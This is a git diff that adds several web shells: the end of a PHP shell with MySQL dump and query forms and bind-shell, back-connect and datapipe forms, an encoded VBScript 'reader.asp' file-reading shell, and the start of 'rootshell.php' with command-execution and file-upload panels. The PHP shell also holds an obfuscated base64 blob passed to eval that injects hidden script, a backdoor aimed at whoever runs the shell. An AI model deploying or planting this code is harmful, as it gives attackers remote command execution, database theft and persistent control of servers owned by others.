+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SHOW TABLES; SELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
+}
+$_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==')); 
+if(!$safe_mode&&!$windows){
+echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'hmb'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dal.net'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>[ alturks.com http://www.alturks.com | <a href http://www.alturks.com</a> | version ".$version." ]</b></font></div></td></tr></table>".$f;
+?>
diff --git a/php/reader.asp.php.txt b/php/reader.asp.php.txt
new file mode 100644
index 0000000..df72204
--- /dev/null
+++ b/php/reader.asp.php.txt
@@ -0,0 +1,116 @@
+<%@ LANGUAGE = VBScript.Encode %>
+
+
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<meta http-equiv="Content-Language" content="tr">
+<!--
+         
+            
+            
+             HACKING 
+              Mehdi & HolyDemon
+                 www.infilak.tr.cx & www.infilaktim.tk
+           
+-->
+<%#@~^FAAAAA==G	PnMDKDPM+k;:PU+XYtwcAAA==^#~@%> 
+<%#@~^2QgAAA==@#@&w.K{	l:P{~JU+^DYor^+/r@#@&HlybsCD,',J@!Vr@*&RHRw~JLw.G|xlhnLJ~?1.bwObxbP|!V^Cx9ığıxı"Pİçbx~Pş+30ü.PAN+Mr"R@!Vb@*~A;~Um.kaOk	P3U,Öx+hsbPÖ"+^sbğk~"l0kw^+MrPVk8k,|CzıDP`^Go*P@!(.@*Y!Yslhldı[ıMR R@!sk@*A;~UmDr2DkUPgCkıV~nE^Vl	ıVm^lğı,5CD9ı:~$ö^ü:üx9nPt+\1;OY!D,rVEz;aYCP_CVmP)U^l:C"klUıy,ASh bx6kVm3cODcmaPUkOnkkxbUPwWD!h~Aö^ü:ü	Nnx~)HDıUYı^ı~AbVLrHkP$;^l8k^rM/r	k.RR,@!^r@*Il.NısP#n,f+kO+0V+MrUNx,fGVCzı,CGVH9+sWU~j+P3VKDG:mUEl~ÇKW0PKş+0VüD,2[+Mkh c@!Vb@*?1DkaOr:bybP!ü\nU^+~|!sVmxC8bVk.dbxryc @!Vr@*|!VVmxıs~Cm3Vıx9l~!xkş,$k^ok,)s:m3,İçkUP( gRoPz[:bx~#Xl~!öM+-VbsDrHVPMöMüşüxü. R@!4.@*@!4.@*@!4D@*@!4M@*@!(.@*@!(D@*@!8D@*@!(D@*@!(.@*@!0GUDPmGsKDxD[@*@!^xD+D@*@!(@*A`P$İI,q HcsPU6s:P5zt(S&H&f(I @!J4@*@!(.@*@!4.@*@!0WUO,mGVK.{4s!+@*$P_l0~MV[k,ACOı^P}mrV,rV9;~T@!4M@*@!t.~1WsWMx4^l^V,/k"n{G@*@!(.@*@!^xD+D@*@!m~tM+W'4YO2=zzSAhckx6rsl0RDD ma@*qh	R&UsbSCVcKD /o@!&l@*'	4daiLx4kwp'x(/2iLx8dai[	8/ai[	8dwp@!mP4DnW{tOYalzJhAAc+3G.K:Cxch3C	kcmWs@*AVWMWhl	R\n0lxb ZK:@!JC@*[	4kwI[U8kwI[	8/ai'U(/wI'	4dwp'	4dai@!lP4DW'4YOw=z&AShR0CDkWxWdl	+kk YV@*nl./KU26/CU/k O0@!&l@*'	4daiLx4kwp'x(/2iLx8dai[	8/ai[	8dwp@!(D@*@!8.@*@!CP4.+6'hCbVYGlslrV(Gs4@$4WD:lbVc^Ws@*\+4Nr@!Jl@*LU4kwiLU8/aiLx8/2ILx8/aI[	4d2p[x8dai@!l,4M+W{:mkVDW=4W^X[+sWU@$4WYsCk^RmKh@*CKVHfn:GU@!zC@*LU4kwI'	4/2ILx8/aILx8kwp[x(/aI[	4dwp@!C~4D+6x:mkVDGl+M3mxqc*@$sXU+D mK:@*30WDGhmx@!zm@*@!4.@*@!(D@*@!l,4D0xtDY2lJzhSARbx0bsC3cYMR^6@*(c1 s@!&l@*J@#@&4+V2~{PEA!~km.bwDPHt9rP:l.l6ıx[C	PqcHRwPKChPzNı	l~5C"ı^:ışOıDc@!4M@*@!sb@*Üm.nDVrPjn,Üm.Ykky,bk2P_WdY^l.ıU,Kü:ü	[+,ÇlVışıM  @!(D@*@!sk@*@!J4@*b9.+kPjCDıDıPFıdsıxCPnG9EU!PVöDüxDüVh+0PİdYNrğr	ky,9WkXl	ıU~b9ıxı,XCyıU c@!8D@*@!Vb@*PnXYl.nmP$öVüsü~Ağ+.,AKş/l,CmOl,.CD,fnh3Yb.R@!4D@*@!sk@*|!D8lUıU,fG/HCVmDıUı~VöDüxOüsXn4bss+V,İçk	PbHxı,j+M\nD9+~6^:l	ı"Pdlyıs~uN9Pwl.3nOs+"Rc~@!(D@*@!^k@*)[M+dPnıdsıxC,Km:Pj+MrPVk.k^k.~vöDx=~N=-h8wl^k1lU-[n6l;VD lkw@!8M@*@!^n	YnD@*@!6WUDP1WVKD{.+9@*H+^+.~Ilwm8k^kDbh@!z6W	Y@*@!&^xO+M@*@!(D@*@!^k@*jrD+[+0r,kU1V!N+^+MrPDlVkaPn[D+0~b9:k	~Kl	+^kU+~i^lşhl@!8D@*@!sr@*bNhr	PŞr0MnkkUbPÇmV:m@!(.@*@!Vr@*U+ddbWx,#+,ZWKVr+,fğ+.Vn.bPÇCVm.l0PJGTkx~6^:C@!(.@*@!sb@*UkYV.k	P#+Mk~Pm4l	slMıxıPİ	[rDs+,\dR  @!4.@*@!8D@*@!^n	Y+.@*@!0GxD~1WsKD{/k^\.@*@!l~tM+Wxslk^OW=:lbs8Ws4@$tGYhCbV mKh@*@!0GUDPmGsKDx/bs7+.@*HACfİ@!zm@*Pr9LwCAA==^#~@%><title>I.N.F HACKING CENTER - <%=#@~^CAAAAA==2MWm	ls+UQMAAA==^#~@%> - www.infilak.tr.cx</title><%#@~^HAEAAA==@#@&l^DP{PI;!n/DR}EDzjDDk	L`rlmDrGxr#@#@&(0~C1Y~',EtV2E,KtnU@#@&^l^s,XCMNb:@#@&+	[Pb0@#@&0VCdKDP{~D;EdOR6WM:cJVsm/GDrb@#@&kds:Px~M+5EdDRWKDs`Jb/^n:r#@#@&b0~rkV+sxJrPY4nU@#@&kkVn:~x,J[EME@#@&+U[,k0@#@&b0~3^CkW.,',JJ,Y4nx,3slkW.x,D+$;+kYRkn.\D7l.kC8^+d`r)nhSmK_5?(/zSmnzP_Jb@#@&gVMAAA==^#~@%><center> <%#@~^UAAAAA==@#@&DnkwKx/RS.kD+~J@!4G[HP4T^W^WD{:f&2&2&@*@!8G9X~YK2:mDLr	'*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width="75%" border=0 bgcolor=black><tr><td><table width="100%" border=0 bgcolor="#666666" cellpadding=1 cellspacing=1><tr><td><center> <%#@~^WQAAAA==@#@&DnkwKx/RS.kD+~J@!khL,/D1xtDYw=&&+cNK:CkU[^6 mKhz0l.dKxF&r	0sWTGcor6P4+kTtDx,y@*E@#@&fhwAAA==^#~@%></td></tr><td bgcolor="#999999" height=32>&nbsp;<Font size=2 Color=000000 Face=Verdana><b>Adres : </b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</Font> <input type=hidden name=islem value=basla> <input type=text name=klasor size=49 value="<%=#@~^BgAAAA==V^ldKDjAIAAA==^#~@%>"> &nbsp; <input type=submit value="Kodları Göster" name=submit> </Font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail.com title="E-mail Gönder"><font face=wingdings color=lime size=4>*</font> </a>&nbsp; <a href=http://www.infilaktim.tk title="I.N.F Sitesi" target=_blank><font face=wingdings color=lime size=4>M</font> </a>&nbsp; <a href="?action=help" title="Yardım" target=inf onClick="window.open('?action=help','inf','width=450,height=400 toolbar=no scrollbars=yes' )"><font face=wingdings color=lime size=4>&</font> </a>&nbsp;</td></tr></form></td></table></td></tr><tr><td><table width="100%" border=0 align=center><tr><td bgcolor="#CCCCCC" height=359><%#@~^QwAAAA==r6PUKY,k/^+s~',J8lkVCE,YtU@#@&D+k2Gxk+ch.kOn,JE[HCybVC.LJJ@#@&Vd+nBQAAA==^#~@%><br><center><textarea rows=24 name=kodlar cols=90>
+<%#@~^yAAAAA==jY~K4NCK:n,xPU+.\D /M+lDnr(L+1OcJtk1DG/GWDRpHduK:nEb@#@&W8%_KPnc6a+U,JV2Kr~,EJL3slkW.'rJ~,Wl^/+@#@&G4NC:KKRjn	N@#@&0GN^l.~{P/n.7+.R4OsV3	mKN+vW(%C:KKR"+d2Kx/P+XY#@#@&.+kwKxd+ AMkO+,VW9VC.@#@&+U[,kWoT4AAA==^#~@%>
+<%#@~^CQAAAA==j`A~UkDkVDwMAAA==^#~@%><style>TD {
+	FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
+}
+BODY {
+	FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
+}
+P {
+	FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
+}
+DIV {
+	FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
+}
+
+A:link {
+	COLOR: #006699; TEXT-DECORATION: none
+}
+A:active {
+	COLOR: #006699; TEXT-DECORATION: none
+}
+A:visited {
+	COLOR: #006699; TEXT-DECORATION: none
+}
+A.postlink {
+	COLOR: #006699; TEXT-DECORATION: none
+}
+A:hover {
+	COLOR: #dd6900
+}
+.bodyline {
+	BORDER-RIGHT: #98aab1 1px solid; BORDER-TOP: #98aab1 1px solid; BACKGROUND: #ffffff; BORDER-LEFT: #98aab1 1px solid; BORDER-BOTTOM: #98aab1 1px solid
+}
+INPUT {
+	BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BACKGROUND-COLOR: #fcfcfc; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #006699
+}
+TEXTAREA {
+	BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BACKGROUND-COLOR: #fcfcfc; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #006699
+}
+SELECT {
+	BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BORDER-RIGHT-COLOR: #006699
+}
+IMG {
+	BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px
+}
+TH {
+	PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKGROUND: #f9bc5e url('images/navbar.jpg'); COLOR: #713600; WHITE-SPACE: nowrap; HEIGHT: 27px; TEXT-ALIGN: center
+}
+TD.cat {
+	FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT: 4px; LETTER-SPACING: 1px; HEIGHT: 27px
+}
+.title {
+	FONT-WEIGHT: bold; FONT-SIZE: 13px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
+}
+.content {
+	BACKGROUND: none transparent scroll repeat 0% 0%; FONT-FAMILY: Verdana, Helvetica
+}
+.block-title {
+	FONT-SIZE: 11px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica
+}
+.storytitle {
+	FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #713600; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
+}
+.storycat {
+	FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: underline
+}
+.boxtitle {
+	FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
+}
+.boxcontent {
+	FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: red; FONT-FAMILY: Verdana, Helvetica
+}
+.option {
+	FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
+}
+.ok {
+	FONT-WEIGHT: normal; FONT-SIZE: 9px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #000000; FONT-FAMILY: webdings; TEXT-DECORATION: none
+}</style><style><!-- 
+body {scrollbar-face-color: #000000; scrollbar-shadow-color: #003333; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #003333; scrollbar-darkshadow-color: #000000; scrollbar-track-color: #993300; scrollbar-arrow-color: #CC3300;}
+}
+// --></style><%#@~^BwAAAA==n	N~kE(oQIAAA==^#~@%>
+
+<%#@~^CgAAAA==d!4~HlMNks8AMAAA==^#~@%><title><%=#@~^CAAAAA==2MWm	ls+UQMAAA==^#~@%></title><body bgcolor=#333333><br><center><font color=red><h4><%=#@~^CAAAAA==2MWm	ls+UQMAAA==^#~@%></center>
+<font color=lime>
+<%=#@~^BAAAAA==4V2qQEAAA==^#~@%>
+<%#@~^HwAAAA==@#@&DnkwKx/RUN@#@&nx9Pd;(@#@&ugcAAA==^#~@%>
+
+
+</textarea>
+<noscript><noscript><plaintext><plaintext>
+<!--
+         
+             HACKING
+            
+             www.infilak.tr.cx
+              Mehdi & HolyDemon
+                 INF TEAM DURMAZ , DURDURULAMAZ
+            Hak Geldi Batıl Zail Oldu..
+-->
\ No newline at end of file
diff --git a/php/robots.php b/php/robots.php
new file mode 100644
index 0000000..b42a3c6
--- /dev/null
+++ b/php/robots.php
@@ -0,0 +1,4 @@
+User-agent: *
+Allow: /#Begin Attracta SEO Tools Sitemap. Do not remove
+sitemap: http://cdn.attracta.com/sitemap/2519186.xml.gz
+#End Attracta SEO Tools Sitemap. Do not remove
diff --git a/php/rootshell.php b/php/rootshell.php
new file mode 100644
index 0000000..4cf9cff
--- /dev/null
+++ b/php/rootshell.php
@@ -0,0 +1,349 @@
+<!--
+/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
+/*  ................jdWMMMMMNk&,...JjdMMMHMMHA+................ */
+/*  .^.^.^.^.^.^..JdMMMBC:vHMMNI..`dMMM8C`ZMMMNs...^^.^^.^^.^^. */
+/*  ..^.^..^.....dMMMBC`....dHNn...dMNI....`vMMMNy.........^... */
+/*  .....^..?XMMMMMBC!..dMM@MMMMMMM#MMH@MNZ,^!OMMHMMNk!..^...^. */
+/*  ^^.^..^.`??????!`JdN0??!??1OUUVT??????XQy!`??????!`..^..^.^ */
+/*  ..^..^.....^..^..?WN0`` `  +llz:`    .dHR:..^.......^..^... */
+/*  ...^..^.^.^..^...`?UXQQQQQeyltOOagQQQeZVz`..^.^^..^..^..^.. */
+/*  ^.^..^..^..^..^.^..`zWMMMMH0llOXHMMMM9C`..^.....^..^..^..^. */
+/*  ..^..^...^..+....^...`zHHWAwtltwAXH8I....^...?+....^...^..^ */
+/*  ...^..^...JdMk&...^.^..^zHNkAAwWMHc...^.....jWNk+....^..^.. */
+/*  ^.^..^..JdMMMMNHo....^..jHMMMMMMMHl.^..^..jWMMMMNk+...^..^. */
+/*  .^....jdNMM9+4MMNmo...?+zZV7???1wZO+.^..ddMMM6?WMMNmc..^..^ */
+/*  ^.^.jqNMM9C!^??UMMNmmmkOltOz+++zltlOzjQQNMMY?!`??WMNNmc^.^. */
+/*  ummQHMM9C!.uQo.??WMMMMNNQQkI!!?wqQQQQHMMMYC!.umx.?7WMNHmmmo */
+/*  OUUUUU6:.jgWNNmx,`OUWHHHHHSI..?wWHHHHHW9C!.udMNHAx.?XUUUU9C */
+/*  .......+dWMMMMMNm+,`+ltltlzz??+1lltltv+^.jdMMMMMMHA+......^ */
+/*  ..^..JdMMMMC`vMMMNkJuAAAAAy+...+uAAAAA&JdMMMBC`dMMMHs....^. */
+/*  ....dMMMMC``.``zHMMMMMMMMMMS==zXMMMMMMMMMM8v``.`?ZMMMNs.... */
+/*  dMMMMMBC!`.....`!?????1OVVCz^^`+OVVC??????!`....^`?vMMMMMNk */
+/*  ??????!`....^.........?ztlOz+++zlltz!........^.....???????! */
+/*  .....^.^^.^..^.^^...uQQHkwz+!!!+zwWHmmo...^.^.^^.^..^....^. */
+/*  ^^.^.....^.^..^...ugHMMMNkz1++++zXMMMMHmx..^....^.^..^.^..^ */
+/*  ..^.^.^.....^...jdHMMMMM9C???????wWMMMMMHn+...^....^..^..^. */
+/*  ^....^.^.^....JdMMMMMMHIz+.......?zdHMMMMMNA....^..^...^..^ */
+/*  .^.^....^...JdMMMMMMHZttOz1111111zlttwWMMMMMNn..^.^..^..^.. */
+/*  ..^.^.^....dNMMMMMWOOtllz!^^^^^^^+1lttOZWMMMMMNA,....^..^.. */
+/*  ^....^..?dNMMMMMC?1ltllllzzzzzzzzzlllltlz?XMMMMNNk+^..^..^. */
+/*  .^.^..+dNMM8T77?!`+lllz!!!!!!!!!!!!+1tll+`??777HMNHm;..^..^ */
+/*  ..^..^jHMMNS`..^.`+ltlz+++++++++++++ztll+`....`dMMMHl.^..^. */
+/*  ....^.jHMMNS`^...`+ltlz+++++++++++++zltl+`^.^.`dMMMHl..^..^ */
+/*  ^^.^..jHMMNS`.^.^`+tllz+...........?+ltl+`.^..`dMMMHl...^.. */
+/*  ..^..^jHMMM6`..^.`+lltltltlz111zltlltlll+`...^`dMMMHl.^..^. */
+/*  ....^.jHNC``.^...`+zltlltlz+^^.+zltlltzz+`..^.^`?dMHl..^..^ */
+/*  .^.^..jHNI....^..^``+zltltlzzzzzltltlv!``.^...^..dMHc....^. */
+/*  ^...jdNMMNmo...^...^`?+ztlltllltlltz!``..^.^...dqNMMNmc.^.. */
+/*  .^.`?7TTTTC!`..^.....^`?!!!!!!!!!!!!`..^....^.`?7TTTTC!..^. */
+/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
+/*
+/*    We should take care some kind of history, i will add here to keep a trace of changes (who made it).
+/*    Also I think we should increase the last version number by 1 if you make some changes.
+/*
+/*    CHANGES / VERSION HISTORY:
+/*    ====================================================================================
+/*    Version        Nick            Description
+/*    - - - - - - - - - - - - - - - - - - - - - - - - - - -
+/*    0.3.1          666            added an ascii bug :)
+/*    0.3.1          666            password protection
+/*    0.3.1          666            GET and POST changes
+/*    0.3.2          666            coded a new uploader
+/*    0.3.2          666            new password protection
+/*    0.3.3          666            added a lot of comments :)
+/*    0.3.3          666            added "Server Info"
+/*    1.0.0          666            added "File Inclusion"
+/*    1.0.0          666            removed password protection (nobody needs it...)
+/*    1.0.0          666            added "Files & Directories"
+/*    1.3.3          666            added "File Editor"
+/*    2.0.0          666            added "Notices"
+/*    2.0.0          666            added some new modules
+/*    2.0.0          666            made some design updates
+/*
+/*
+-->
+<?
+//
+// Default Changes
+//    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
+
+$owner        = "SR-Crew";                                                      // Insert your nick
+$version      = "2.0.0";                                                        // The version    
+
+//    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
+//
+?>
+
+<body link="#000000" vlink="#000000" alink="#000000" bgcolor="#FFFFD5">
+<style type="text/css">
+body{
+cursor:crosshair 
+}
+</style>
+<div align="center" style="width: 100%; height: 100">
+<pre width="100%" align="center"><strong> ____             _         ____  _          _ _
+|  _ \ ___   ___ | |_      / ___|| |__   ___| | |
+| |_) / _ \ / _ \| __|     \___ \| '_ \ / _ \ | |
+|  _ < (_) | (_) | |_   _   ___) | | | |  __/ | |
+|_| \_\___/ \___/ \__| (_) |____/|_| |_|\___|_|_|</pre>
+</div></strong>
+<b><u><center><font face='Verdana' style='font-size: 8pt'><?php echo "This server has been infected by $owner"; ?></font></center></u></b>
+<hr color="#000000" size="2,5">
+
+<div align="center">
+  <center>
+  <p>
+  <?php 
+// Check for safe mode
+if( ini_get('safe_mode') ) {
+   print '<font face="Verdana" color="#FF0000" style="font-size:10pt"><b>Safe Mode ON</b></font>';
+} else {
+   print '<font face="Verdana" color="#008000" style="font-size:10pt"><b>Safe Mode OFF</b></font>';
+}
+
+?>
+&nbsp;</p><font face="Webdings" size="6">!</font><br>
+&nbsp;<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="25" bordercolor="#000000">
+    <tr>
+      <td width="1%" height="25" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ Server Info ]</font></td>
+    </tr>
+    <tr>
+      <td width="49%" height="142">
+      <p align="center">
+        <font face="Verdana" style="font-size: 8pt"><b>Current Directory:</b> <? echo $_SERVER['DOCUMENT_ROOT']; ?>
+        <br />
+        <b>Shell:</b> <? echo $SCRIPT_FILENAME ?>
+        <br>
+        <b>Server Software:</b> <? echo $SERVER_SOFTWARE ?><br>
+        <b>Server Name:</b> <? echo $SERVER_NAME ?><br>
+        <b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?><br>
+        </font></tr>
+  </table><br />
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="426" bordercolor="#000000">
+    <tr>
+      <td width="49%" height="25" bgcolor="#FCFEBA" valign="middle">
+      <p align="center"><font face="Verdana" size="2">[ Command Execute ]</font></td>
+      <td width="51%" height="26" bgcolor="#FCFEBA" valign="middle">
+      <p align="center"><font face="Verdana" size="2">[ File Upload ]</font></td>
+    </tr>
+    <tr>
+      <td width="49%" height="142">
+      <p align="center"><form method="post">
+<p align="center">
+<br>
+<font face="Verdana" style="font-size: 8pt">Insert your commands here:</font><br>
+<br>
+<textarea size="70" name="command" rows="2" cols="40" ></textarea> <br>
+<br><input type="submit" value="Execute!"><br>
+&nbsp;<br></p>
+      </form>
